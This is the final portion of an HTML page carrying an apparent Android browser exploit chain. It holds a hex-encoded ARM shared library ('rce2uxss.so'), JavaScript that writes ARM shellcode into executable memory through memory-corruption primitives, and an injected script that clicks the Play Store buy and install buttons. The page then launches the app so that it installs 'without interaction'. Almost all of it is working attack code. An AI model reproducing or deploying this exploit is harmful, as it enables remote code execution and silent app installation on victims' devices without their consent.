00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002118000025180000291800004d180000e918000081190000a5190000551a0000291b0000751b0000b51b0000cd1b0000d51b0000311c00007d1c0000851c00006007000003000000b84f0000020000007800000017000000200600001400000011000000110000007005000012000000b00000001300000008000000faffff6f1500000006000000a00100000b0000001000000005000000f00200000a000000b5010000f5feff6fa80400000100000011010000010000003f0000000100000015000000010000001b01000001000000230100000100000032010000010000003e010000010000004b0100000100000057010000010000006901000001000000860100000100000093010000010000009f0100000e0000001d0000001a000000544e00001c000000040000001e00000008000000fbffff6f01000000f0ffff6fd8040000fcffff6f04050000fdffff6f01000000feffff6f20050000ffffff6f02000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000008d130000e9130000e113000000000000000000000000000098060000980600009806000098060000980600009806000098060000980600009806000098060000980600009806000098060000980600009806000000500000000000002de9f04f0746b3b00846884600000000004743433a2028474e552920342e392e782d676f6f676c65203230313430383237202870726572656c656173652900636c616e672076657273696f6e20332e3620000000040000000900000004000000474e5500676f6c6420312e3131000000414100000061656162690001370000000541524d20763700060a0741080109020a050c021102120414011501170318011a021b031e062201240126012a012c02440372636532757873732e736f0004c98756002e7368737472746162002e696e74657270002e6e6f74652e616e64726f69642e6964656e74002e6e6f74652e676e752e6275696c642d6964002e64796e73796d002e64796e737472002e676e752e68617368002e676e752e76657273696f6e002e676e752e76657273696f6e5f64002e676e752e76657273696f6e5f72002e72656c2e64796e002e72656c2e706c74002e74657874002e41524d2e6578696478002e726f64617461002e41524d2e6578746162002e646174612e72656c2e726f2e6c6f63616c002e66696e695f6172726179002e64796e616d6963002e676f74002e64617461002e627373002e636f6d6d656e74002e6e6f74652e676e752e676f6c642d76657273696f6e002e41524d2e61747472696275746573002e676e755f64656275676c696e6b000000000000000000000000000000000000000000000000000000000000000000000000000000000000000b00000001000000020000005401000054010000130000000000000000000000010000000000000013000000070000000200000068010000680100001800000000000000000000000400000000000000270000000700000002000000800100008001000020000000000000000000000004000000000000003a0000000b00000002000000a0010000a00100005001000005000000010000000400000010000000420000000300000002000000f0020000f0020000b5010000000000000000000001000000000000004a000000f6ffff6f02000000a8040000a8040000300000000400000000000000040000000400000054000000ffffff6f02000000d8040000d80400002a0000000400000000000000020000000200000061000000fdffff6f0200000004050000040500001c0000000500000001000000040000000000000070000000feffff6f02000000200500002005000050000000050000000200000004000000000000007f00000009000000020000007005000070050000b000000004000000000000000400000008000000880000000900000042000000200600002006000078000000040000000c00000004000000080000008c00000001000000060000009806000098060000c8000000000000000000000004000000000000009100000001000000060000006007000060070000bc1e0000000000000000000004000000000000009700000001000070820000001c2600001c260000300100000d000000000000000400000008000000a200000001000000320000004c2700004c270000d507000000000000000000000400000001000000aa0000000100000002000000242f0000242f00002400000000000000000000000400000000000000b500000001000000030000000c4e00000c3e00004800000000000000000000000400000000000000c80000000f00000003000000544e0000543e00000400000000000000000000000400000000000000d40000000600000003000000584e0000583e00005001000005000000000000000400000008000000dd0000000100000003000000a84f0000a83f00005800000000000000000000000400000000000000e2000000010000000300000000500000004000001800000000000000000000000800000000000000e8000000080000000300000018500000184000001900000000000000000000000400000000000000ed000000010000003000000000000000184000004200000000000000000000000100000001000000f60000000700000000000000000000005c4000001c000000000000000000000004000000000000000d0100000300007000000000000000007840000042000000000000000000000001000000000000001d010000010000000000000000000000ba400000100000000000000000000000010000000000000001000000030000000000000000000000ca4000002c01000000000000000000000100000000000000";
function write_shellcode(dlsym_addr,buffer){
//ldr r0,[pc,4]//0xe59f0004
//ldr r1,[pc,4]//0xe59f1004
//b shellcode;//0xea000001
//dlopen_addr//array_buffer_address
//dlsym_addr
//shellcode
//var stub=[0xe59f0004,0xe59f1004,0xea000001,dlsym_addr+0xc,dlsym_addr];
var stub=[0xe59f0004,0xe59f1004,0xea000001,array_buffer_address,array_buffer_len];
for(var i=0;i<stub.length;i++){
get_dateview(buffer).setUint32(i*4,stub[i],true);
}
for(var i=0;i<shellcode.length;i++){
get_dateview(buffer+stub.length*4).setUint8(i,shellcode[i]);
}
return stub.length*4+shellcode.length;
}
function backup_original_code(start_address){
var backup_arr = [];
for(var i=0;i<shellcode.length+4096;i++){
backup_arr[i]=get_dateview(start_address).getUint8(i);
}
return backup_arr;
}
function restore_original_code(start_address,backup_arr){
for(var i=0;i<shellcode.length+4096;i++){
get_dateview(start_address).setUint8(i,backup_arr[i]);
}
}
huge_func(0xdeadbeaf);
function xss_code(){
//alert(navigator.userAgent);
setTimeout(function(){
//alert(document.cookie);
document.getElementsByClassName("price buy id-track-click")[0].click();
setTimeout(function(){
document.getElementById("purchase-ok-button").click();
document.write("<h1>the app will be installed and launched without interaction</h1>");
setTimeout(function(){
window.open("intent://scan/#Intent;scheme=zxing;package=com.google.zxing.client.android;end");
},10000);
},3000);
},8000);
}
var js_str="\n"+xss_code.toString()+"xss_code();\n";
var backup_arr=backup_original_code(gc_code_entry);
var writed_len = write_shellcode(dlsym_addr,gc_code_entry);
var args_view = new DataView(g_arraybuffer,0,32);
var so_file_view = new DataView(g_arraybuffer,4096);
var js_view = new DataView(g_arraybuffer,0x100000);
args_view.setUint32(0,dlsym_addr-36,true);
args_view.setUint32(4,dlsym_addr,true);
args_view.setUint32(8,gc_code_entry,true);
args_view.setUint32(12,writed_len,true);
args_view.setUint32(16,array_buffer_address+4096,true);
args_view.setUint32(20,so_str.length/2,true);
args_view.setUint32(24,array_buffer_address+0x100000,true);
args_view.setUint32(28,js_str.length,true);
log("length is "+so_str.length);
for(var i=0;i<so_str.length;i+=2){
var value = so_str.substr(i,2);
value = "0x"+value;
so_file_view.setUint8(i/2,parseInt(value));
}
for(var i=0;i<js_str.length;i++){
js_view.setUint8(i,js_str.charCodeAt(i));
}
huge_func(10);
restore_original_code(gc_code_entry,backup_arr);
//document.documentElement.webkitRequestFullscreen();
//top.location='https://play.google.com/store/apps/details?id=com.game.BMX_Boy';
top.location='https://play.google.com/store/apps/details?id=com.google.zxing.client.android';
</script><h3>[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null]</h3><h3>[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null]</h3>
</body></html>